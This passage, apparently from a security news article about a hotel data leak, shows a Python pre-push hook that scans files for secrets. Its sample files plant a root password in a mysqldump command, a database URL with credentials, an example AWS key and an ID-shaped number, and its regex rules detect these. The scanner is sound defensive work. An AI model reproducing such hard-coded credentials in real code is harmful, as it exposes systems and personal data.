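    "scripts/export.sh": "mysqldump -h db.internal -u root -p'hunter2' guests > /tmp/guests.sql\n",
    "src/settings.py": "DATABASE_URL = 'postgres://app:hunter2@db.internal:5432/hotel'\n"
                       "AWS_SECRET_ACCESS_KEY = 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY'\n",
    "README.md": "Set the password via the PASSWORD environment variable.\n",
    "data/guests.csv": "name,id_number,mobile\nZhang San,110101199001011234,13800138000\n",
}

# Illustrative rules: (name, compiled regex). Each is deliberately narrow to keep false positives low.
RULES = [
    ("connection string with credentials", re.compile(r"\b[a-z]+://[^\s:/]+:[^\s@/]+@[^\s]+")),
    ("password assignment", re.compile(r"(?i)\b(password|passwd|pwd)\s*[:=]\s*['\"]?([^\s'\"]{6,})")),
    ("mysql -p inline password", re.compile(r"\s-p['\"]?[^\s'\"]{4,}")),
    ("AWS secret key", re.compile(r"(?i)aws_secret_access_key\s*[:=]\s*['\"]?([A-Za-z0-9/+=]{40})")),
    ("18-digit national ID number", re.compile(r"\b\d{17}[\dXx]\b")),
]


def scan_file(path, content):
    """Return one hit per (line, rule) match in a single file."""
    hits = []
    for lineno, line in enumerate(content.splitlines(), 1):
        for name, rx in RULES:
            if rx.search(line):
                hits.append({"path": path, "line": lineno, "rule": name})
    return hits


def scan_push(files):
    """Scan every file in the push; files is {path: content}."""
    hits = []
    for path, content in files.items():
        hits.extend(scan_file(path, content))
    return hits


def should_block(files):
    """Policy for a pre-push hook: any hit blocks the push until a human has looked."""
    return bool(scan_push(files))


if __name__ == "__main__":
    for h in scan_push(SAMPLE_FILES):
        print("%s:%d  %s" % (h["path"], h["line"], h["rule"]))
    print("block push:", should_block(SAMPLE_FILES))
```

In a real hook the `files` mapping would be built from the output of `git diff --cached` rather than from constants, and the data rule would be tuned to whatever identifier formats the business actually handles; the point is that a database dump or a settings file full of credentials is recognisable by shape before anyone outside the team can see it, which is what GitHub's visibility otherwise guarantees.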

If any EU citizens' data is among the trove, it will also be interesting to see how China reacts to a possible GDPR investigation.

Source: Information Security Magazine